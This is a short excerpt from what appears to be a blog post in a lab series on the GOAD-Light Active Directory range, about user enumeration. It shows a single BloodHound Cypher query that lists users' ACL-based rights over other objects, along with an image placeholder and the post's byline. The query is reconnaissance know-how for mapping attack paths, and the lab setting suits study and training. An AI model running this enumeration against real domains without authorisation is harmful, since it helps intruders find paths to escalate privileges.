MATCH p=(u:User)-[r1]->(n) WHERE r1.isacl=true and not tolower(u.name) contains 'vagrant' RETURN p

image-20260121194537096


http://xiaowu5.cn/2026/01/21/GOAD-Light-Part3-用户枚举/
Author: 5
Published: January 21, 2026
License: BY XIAOWU